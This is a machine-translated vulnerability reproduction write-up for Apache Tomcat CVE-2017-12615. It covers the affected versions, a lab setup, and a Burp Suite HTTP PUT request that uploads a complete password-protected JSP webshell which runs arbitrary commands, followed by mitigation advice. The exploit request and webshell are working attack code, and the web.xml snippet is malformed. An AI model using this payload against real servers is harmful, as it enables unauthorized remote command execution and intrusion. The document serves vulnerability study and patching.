One, background
September 19, 2017, Apache Tomcat official identified and fixed two high-risk vulnerabilities, there is a remote code execution vulnerability (CVE-2017-12615), when there are loopholes in Tomcat running on a Windows host, and enabled HTTP PUT request method, requested by malicious visitors to upload to the server configuration file contains any diam JSP, resulting in arbitrary code execution, very serious harm.
Second, the scope of
Apache Tomcat 7.0.0-7.0.81
Third, the test environment
Windows 7
Apache Tomcat 7.0.56
JDK
Fourth, the vulnerability reproduction
Tomcat version 7.0.56 Download Vulnerability
https://archive.apache.org/dist/tomcat/tomcat-7/v7.0.56/bin/
According to his own version of the system to select the appropriate installation package
installation
It requires JDK environment
Visit http: // localhost: 8080 get the following page is the installation is complete.
After completing the Open conf / web.xml file, the default readonly is true, prohibits conduct HTTP PUT and DELETE request types:
Files can be manipulated through PUT / DELETE When the web.xml readonly set to false, trigger the vulnerability.
Modify the web.xml readonly argument is false.
Find this location, coupled with the phrase
<init-param>
<param-name>readonly<param-name>
<param-name>false<param-name>
</init-param>
Start tomcat, constructed using burpsuite send webshell
PUT /1.jsp/ HTTP/1.1 Host: 192.168.243.129:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 660 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
Visit the following address verification pony
Fifth, suggested fix
- Readonly configuration parameter is true, or annotation, and prohibit the use of the PUT method restart tomcat. Note If you disable the PUT method for the application of the PUT method dependent, may result in the application not work.
- According to the official upgrade to the latest version of the patch.